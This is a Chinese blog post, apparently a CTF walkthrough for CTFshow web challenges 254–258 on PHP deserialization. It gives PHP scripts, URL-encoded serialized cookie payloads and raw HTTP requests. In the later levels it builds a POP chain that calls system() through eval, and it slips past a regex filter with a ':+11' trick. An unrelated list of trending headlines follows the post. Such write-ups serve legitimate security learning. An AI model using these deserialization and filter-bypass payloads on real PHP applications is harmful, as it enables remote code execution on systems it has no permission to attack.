渗透学习-CTF篇-web-CTFshow(仅有部分,持续更新中)
创始人
2025-05-31 05:01:25
0

文章目录

  • 前言
  • web入门部分
    • 反序列化
      • web254
      • web255
      • web256
      • web257
      • web258


前言

本文将主要介绍CTFshow的关卡攻略,至于基本的原理请参考本人的其他介绍漏洞原理的博客。


web入门部分

反序列化

原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。

web254

如下图所示,展现了基于本关代码的解题思路:
在这里插入图片描述

至此,我们要想获取flag值,只需在url中赋予username、password的值为xxxxxx(即需与ctfshower对象中公共变量username、password的值一致)

构造的payload如下:

?username=xxxxxx&password=xxxxxx

在这里插入图片描述

至此,完成本关!!! 较为轻松。

web255

在这里插入图片描述

根据上面的代码逻辑解析图,我们发现要想获取flag值,我们需要做到以下几点:

  1. url中传入的username、password的值要与对象ctfShowerUser对象中公共变量username、password的值保持一致;
  2. 为了能够进入到getflag函数并成功输出,我们需要设置isVIP这个变量的值为true。

关于第一点,我们可以直接进行传参即可:

?username=xxxxxx&password=xxxxxx

关于第二点,根据图片中第2点的标注,我们可以知道,这里是利用了cookie来接收一个序列化的值后在进行反序列化的操作。
因此,我们可以,构造一个调用了对象ctfShowUser并把变量isvip值设置为True的序列化字符串,而后将其传入到cookie中的user变量值处。 至此,当代码执行时,就会将我们构造的字符串进行反序列化的操作,并把这个对象初始化给$user。 此时,user中包含的这个ctfShowUser对象实例中的isVIP的值就为True了,至此就可以调用public function vipOneKeyGetFlag这个函数并进行输出。

payload如下:(一定一定要在变量中设置isVIP为True)
加上urlencode是为了是的序列化后的编码输出以及在网页处理过程中不会混乱,或者出现乱码等等。

public $isVip=true;
} $a = new ctfShowUser();
echo urlencode(serialize($a));
?>

最后,输出结果如下:

O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

然后将其放入到cookie中,最后构造的数据包如下:(修改地方为GET 与Cookie 其余的不要动)

GET /?username=xxxxxx&password=xxxxxx HTTP/1.1
Host:xxxx
User-Agent: xxxx
Accept: xxx
Accept-Language: xxxx
Accept-Encoding: xxxx
Cookie: user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
Connection: close
Upgrade-Insecure-Requests: 1

至此,结果已出:
在这里插入图片描述

web256

在这里插入图片描述

通过上图,我们可以看出在3和4步骤中会有矛盾的地方。即,在本对象中username与password的值是一样的,因此,若不做处理的话,第四步将永远无法进入。

那么,在前面我们构造过一个序列化的ctfShowUser对象并修改了其isVIP的值。那么,为了应对这里第四步的判断,我们依旧可以直接构造一个序列化的对象,并将其中的usernam与passwo的值分别修改为x与y,isVIP的值修改为true,以此达到绕过第四部步的判断,进入输出flag的部分。

pop链如下:

public $username='x';public $password='y'; public $isVip=true;
} $a = new ctfShowUser();
echo urlencode(serialize($a));
?>

输出结果如下:

O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22x%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%22y%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

这里,要注意蛤,由于我们已经修改了对象中username以及password的值,因此这里url传入的值要与我们修改的部分一致!

payload如下:(在数据包里添加)

GET /?username=x&password=y HTTP/1.1
Cookie: user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22x%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%22y%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

拿到flag了!!!

在这里插入图片描述

web257

分析一下代码的整体流程:
在这里插入图片描述

据此,根据上述流程可知,若我们在第四步中将class赋予的对象实例从info对象换成backDoor对象的话,则在代码结束后就会自动调用backDoor对象里的getInfo函数,并执行eval($code)。

此时,我们再将code的值赋予一个命令执行的payload即可:

构造链:

private $class = 'backDoor';public function __construct(){$this->class=new backDoor();}
}class backDoor{private $code = 'system("tac f*");';public function getInfo(){eval($this->code);}
}$a = new ctfShowUser();
echo urlencode(serialize($a));?>

运行结果:

O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A17%3A%22system%28%22tac+f%2A%22%29%3B%22%3B%7D%7D

payload:(在数据包里添加)

GET /?username=xxxxxx&password=xxxxxx HTTP/1.1
Cookie: user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A17%3A%22system%28%22tac+f%2A%22%29%3B%22%3B%7D%7D

在这里插入图片描述

web258

本关和上一关代码基本一致,因此具体分析流程间257关。 但是本关再传入cookie时添加了过滤的操作:
在这里插入图片描述

这里的这段正则表达式【'/[oc]:\d+:/i】的意思是匹配所有的以o、c、O、C开头,加冒号:,加数字、再加冒号:的字符串。让我们,先看看原始的序列化字符串的样子:
在这里插入图片描述

(这里的麻将可能是编码错误,所以说我们写入的payload最好用urlencode进行编码)

至此,根据正则匹配式,我们可以将:11替换成:+11。当中间多了个时,就不符合上述的正则匹配了!

private $class = 'backDoor';public function __construct(){$this->class=new backDoor();}
}class backDoor{private $code = 'system("tac f*");';
}$a=serialize(new ctfShowUser());
$b=str_replace(':11', ':+11',$a);
$c=str_replace(':8', ':+8',$b);
echo urlencode($c);?>

输出结果:

O%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A17%3A%22system%28%22tac+f%2A%22%29%3B%22%3B%7D%7D

相关内容

热门资讯

关于毕业分手的适合发说说的唯美... 一个人,屋里空荡荡的,只能买几条小鱼陪伴,可是没几天就死了好些。工作也依然没有着落。也没有了想要再次...
关于毕业分手温馨说说带牵手图片... 温馨说说带牵手图片,说说带牵手图片素材。我希望以后的生活 有我喜欢的工作 有我喜欢的人 就算不能经常...
关于高考的说说带唯美手绘图片 ... 说说带唯美手绘图片,说说带手绘漫画图片我打了又删 删了又打 打好的一句话 还是没办法按下发送键。 不...
关于毕业季节qq空间女生说说配... qq空间女生说说配图,经典配图qq空间说说青春灿烂的光年,被情商的阳光一照,全都死了。乡间小道,在对...
数字经济转型之下医院信息化平台... 3月11日,由东南大学附属中大医院信息中心主办的智慧健康新江苏交流会在南京顺利举行。 ...
东方联盟揭示了 CatB 勒索... 据观察,CatB 勒索软件操作背后的威胁行为者使用一种称为DLL 搜索顺序劫持的技术来...
我的1919观后感1000字 ...  【篇一】  前些天,班里同学一同观看了影片《我的1919》,这部影片讲述的是在第一次世界大战末,属...
最新或2023(历届)活着观后...  【篇一】  不去品尝生活的苦就不会懂得幸福的真谛。从古至今,有谁没有遭遇过挫折,又有谁没有过不幸的...
三傻大闹宝莱坞观后感1000字...  【篇一】  《三傻大闹宝莱坞》,起初刚听到这部电影的名字的时候,我感觉这无非就是一部搞笑的电影。但...
最新或2023(历届)心灵捕手...   一部名叫《最强大脑》的节目,使“雨人”一词再次走向人们的视野。而心理题材的电影,也历来备受影迷追...
毕业qq女生忧伤说说签名带图片... qq女生忧伤说说带图片 六组女生忧伤带图片的说说~~如果您喜欢本文请分享给您的好友~~我从来不...
YOLOv5网络结构,训练策略... 前言 前面已经讲过了Yolov5模型目标检测和分类模型训练流程,这一篇讲解一下yolo...
最新或2023(历届)作文千手...  【篇一】  21个聋哑人,她们在舞台上尽情挥洒,她们在残缺中追求完美,在无声中激荡生命。她们在娇媚...
[SwiftUI]GroupB... 代码: import SwiftUIstruct MPMineView: View {...
甲午大海战观后感2000字 甲...   【篇一】  坐在电脑前看《一八九四·甲午大海战》时,我是怀着十分忐忑的心情的,因为已经预知那段清...
风雨哈佛路观后感500字 风雨...   【篇一】  这部电影我看了很受触动,女主人公经历了常人不敢想象的成长道路,最终实现了梦想,走进了...
最新或2023(历届)感动中国...  【篇一】  "感动你我,感动中国,这世界有爱才转动。感动你我,感动中国,这世界有爱才永恒。"当《感...
历史文献纪录片信仰观后感 历史... 【篇一】  曾经,在念大学的时候,"信仰"对我而言是很空、很大,虚无缥缈,是个看不见、摸不着的东西。...
【ACL】访问控制列表 文章目录1.访问控制列表1.1 ACL概述1.2 ACL在接口的应用方向2.ACL的工作原理2.1 ...
优秀班主任主要事迹10篇汇总 ... 篇一:  本人自2009年参加工作以来,一直担任班主任工作,本人在班级管理、教学和德育工作方面均表现...